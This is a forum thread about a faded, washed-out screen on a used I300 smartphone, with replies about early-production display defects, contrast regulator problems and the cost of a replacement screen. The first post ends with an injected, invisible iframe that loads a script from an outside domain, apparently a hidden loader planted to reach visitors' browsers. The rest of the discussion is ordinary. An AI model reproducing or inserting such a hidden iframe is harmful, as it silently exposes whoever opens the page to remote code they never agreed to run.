+ Reply to Thread

Question Washed out screen...

I just recently purchased a used I300 off eBay. The only thing I notice is that the center of the screen seems somewhat 'washed out', so to speak. It's hardly noticable and really doesn't bother me. I was just wondering if this is a known problem with the I300?

In talking with the seller he explained that it happened a couple weeks after he bought it, but never got any worse so he didn't worry about it.

I've adjusted the contrast, but it doesn't make a difference. I'm assuming there is no quick fix right?

Thanks <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Keep looking up...

Administrator

Arrow

some early model screens were not too good, and your phone may be such a model.

there is no fix at all, short of getting a new screen.

people (like me) who got the first production runs back in oct. 2001 are now seeing a blemish at the top of the screen and along the sides.... is you do a search on this you may find similiar postings...

Thanks Marctronixx!

Is it possible to buy and new screen and install it yourself? At one time I had came across a site that sold pda/phone parts.
    Keep looking up...

I've got the same problem and I bought mine around when it first came out as well.. I just figured that it was old age, heat and the fact that it was the first edition (beta almost) that made it a little bit ugly around the edges.
    -Nuncio

Administrator
    its proably not cost effective to replace the screen.. better to find one for sale. email macmetal.. he has a few i300's and may be able to do someting for you...

sprint pcs beta tester macmetal666's Avatar
    not worth the repair.....most of the units also had problems with the contrast control. some were actually touchier than others. i think it had to do with a poor design on the regulator on the ic so it made the tolerance a little too much on some units and not enough on others.

i actually see more that are "blacked out" than "whited out", but both ways it is common.

btw price of a new screen ? $163.48 plus labor. price of a new unit? $199.99
    you do the math.

if it doesnt really bother you, then dont really worry about.
    ps almost every unit i see has a purple half moon below the earpiece. why? magnet on the speaker phone, causing gauzing!
    my i500 is more obsolete than your ti-99 or apple IIe